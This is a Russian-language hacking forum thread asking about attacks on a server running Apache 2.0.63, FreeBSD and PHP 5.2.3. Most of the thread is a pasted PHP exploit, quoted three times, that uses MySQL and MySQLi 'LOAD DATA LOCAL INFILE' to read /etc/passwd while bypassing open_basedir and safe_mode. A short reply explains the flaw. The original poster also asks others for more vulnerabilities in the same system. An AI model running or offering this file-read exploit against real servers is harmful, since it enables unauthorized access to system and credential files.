Форум АНТИЧАТ - Apache/2.0.63 (FreeBSD) PHP/5.2.3

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Apache/2.0.63 (FreeBSD) PHP/5.2.3 (https://forum.antichat.xyz/showthread.php?t=75089)

Apache/2.0.63 (FreeBSD) PHP/5.2.3

Нашол уязвимость на php 5.2.3

PHP код:


		
			
<?php  file_get_contents('/etc/passwd');  $l = mysql_connect("localhost", "root"); mysql_query("CREATE DATABASE a"); mysql_query("CREATE TABLE a.a (a varchar(1024))"); mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'"); mysql_close($l); mysql_connect("localhost", "aaaa");  mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");  $result = mysql_query("SELECT a FROM a.a"); while(list($row) = mysql_fetch_row($result)) print $row . chr(10);  ?>  MySQLi:  <?php  function r($fp, &$buf, $len, &$err) { print fread($fp, $len); }  $m = new mysqli('localhost', 'aaaa', '', 'a'); $m->options(MYSQLI_OPT_LOCAL_INFILE, 1); $m->set_local_infile_handler("r"); $m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $m->close();  ?>

Что нужно для этого експлоита?доступ?
Может ктота подскажет еще уязвимости на эту систему)

представь данные в нормальном формате плз.
чтобы удобно было читать, понять и дать тебе нормальный совет

Код:

<?php



file_get_contents('/etc/passwd');



$l = mysql_connect("localhost", "root");

mysql_query("CREATE DATABASE a");

mysql_query("CREATE TABLE a.a (a varchar(1024))");

mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");

mysql_close($l); mysql_connect("localhost", "aaaa");



mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");



$result = mysql_query("SELECT a FROM a.a");

while(list($row) = mysql_fetch_row($result))

print $row . chr(10);



?>



MySQLi:



<?php



function r($fp, &$buf, $len, &$err) {

print fread($fp, $len);

}



$m = new mysqli('localhost', 'aaaa', '', 'a');

$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);

$m->set_local_infile_handler("r");

$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");

$m->close();



?>

Цитата:

Сообщение от DimOnOID

Код:

<?php



file_get_contents('/etc/passwd');



$l = mysql_connect("localhost", "root");

mysql_query("CREATE DATABASE a");

mysql_query("CREATE TABLE a.a (a varchar(1024))");

mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");

mysql_close($l); mysql_connect("localhost", "aaaa");



mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");



$result = mysql_query("SELECT a FROM a.a");

while(list($row) = mysql_fetch_row($result))

print $row . chr(10);



?>



MySQLi:



<?php



function r($fp, &$buf, $len, &$err) {

print fread($fp, $len);

}



$m = new mysqli('localhost', 'aaaa', '', 'a');

$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);

$m->set_local_infile_handler("r");

$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");

$m->close();



?>

Ага точно_)
Уязвимость существует из-за ошибки при обработке SQL запросов, содержащих "LOCAL INFILE" внутри MySQL и MySQLi расширений. Злоумышленник может обойти ограничения директив "open_basedir" и "safe_mode"